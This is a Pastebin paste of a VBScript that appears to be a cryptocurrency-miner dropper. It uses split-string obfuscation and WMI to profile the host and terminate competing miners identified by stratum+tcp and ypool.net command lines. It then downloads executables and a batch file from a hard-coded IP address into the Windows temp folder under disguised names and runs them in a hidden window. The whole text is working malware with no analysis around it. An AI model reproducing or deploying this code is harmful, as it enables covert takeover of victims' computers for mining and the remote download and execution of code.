Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- On Error Resume Next
- Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService
- Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\DEFAULT:StdRegProv")
- objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Nls\Language", "Default",OSlag)
- objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion",OSver)
- objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "NUMBER_OF_PROCESSORS",numcpus)
- Set objFSO = CreateObject("Scripting.FileSystemObject")
- windir = objFSO.GetSpecialFolder(0)
- Dim needdl
- needdl = 1
- user_agent_list=array("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", _
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", _
- "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16", _
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", _
- "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15", _
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", _
- "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", _
- "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)")
- Randomize
- X=CInt(7*Rnd())
- strComputer = "."
- Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
- Set cols=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
- For Each objItemm in cols
- If InStr(1,LCase(objItemm.CommandLine), LCase("-manliana")) > 0 Then objItemm.Terminate
- If InStr(1,LCase(objItemm.ExecutablePath), LCase("smssm.exe")) > 0 Then objItemm.Terminate
- Next
- wscript.sleep 5000
- Set colProcessList1=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
- For Each objItem in colProcessList1
- If InStr(1,objItem.CommandLine, "CGX2U2oeocN3DTJhyPG2cPg7xpRRTzNZkz") > 0 Then needdl = 0
- If InStr(1,objItem.CommandLine, "CcTzQsSWvf1zhbMA3kf2rpYxogEMcVjmJ3") > 0 Then needdl = 0
- If InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0 Then
- objItem.Terminate
- End If
- notsyspath = not(InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\lsass.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\services.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\csrss.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\winlogon.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\smss.exe") > 0)
- hcline = InStr(1,LCase(objItem.CommandLine), "-datadir=") > 0 Or InStr(1,LCase(objItem.CommandLine), "ypool.net") > 0 Or InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0
- if notsyspath and hcline then
- objProcess.Terminate
- End If
- Next
- If needdl = 1 Then
- OStype = X86orX64()
- if OStype = "x86" Then
- dl "http://66.186.188.227:88/32.exe","c:\windows\temp\mstdc.exe"
- dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
- runprg "c:\windows\temp\sst.bat"
- WScript.Quit
- ElseIf OStype = "x64" Then
- dl "http://66.186.188.227:88/64.exe","c:\windows\temp\mstdc.exe"
- dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
- runprg "c:\windows\temp\sst.bat"
- WScript.Quit
- End If
- End If
- Function dl(u,f)
- dim xHttp:Set xHttp = createobject("WinH" & "ttp.WinHt" & "tpRequ" & "est.5.1")
- dim bStrm:Set bStrm = createobject("Ad" & "od" & "b.S" & "tre" & "am")
- xHttp.Open "GET",u, 0
- xHttp.SetRequestHeader "User-Agent", user_agent_list(X)
- xHttp.Send
- with bStrm
- .type = 1
- .open
- .write xHttp.responseBody
- .savetofile f,2
- .close
- end with
- End Function
- Function runprg(ppath)
- Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2")
- Set objStartup = objPS.Get("Win32_ProcessStartup")
- Set objConfig = objStartup.SpawnInstance_()
- objConfig.ShowWindow = 0
- Set objShare = objPS.Get("Win32_Process")
- Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
- objInParam.Properties_.Item("CommandLine") = ppath
- objInParam.Properties_.Item("ProcessStartupInformation") = objConfig
- Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
- End Function
- Function X86orX64()
- On Error Resume Next
- strComputer = "."
- Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
- For Each objItem in colItems
- If InStr(objItem.SystemType, "86") <> 0 Then
- X86orX64 = "x86"
- ElseIf InStr(objItem.SystemType, "64") <> 0 Then
- X86orX64 = "x64"
- Else
- X86orX64 = objItem.SystemType
- End If
- Next
- End Function
- Function wlog(slog)
- Set objFSO = CreateObject("Scripting.FileSystemObject")
- windir = objFSO.GetSpecialFolder(0)
- Set f = objFSO.CreateTextFile(windir + "\wb2010kb.log",1)
- f.WriteLine(slog)
- f.Close
- Set objFSO = Nothing
- End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement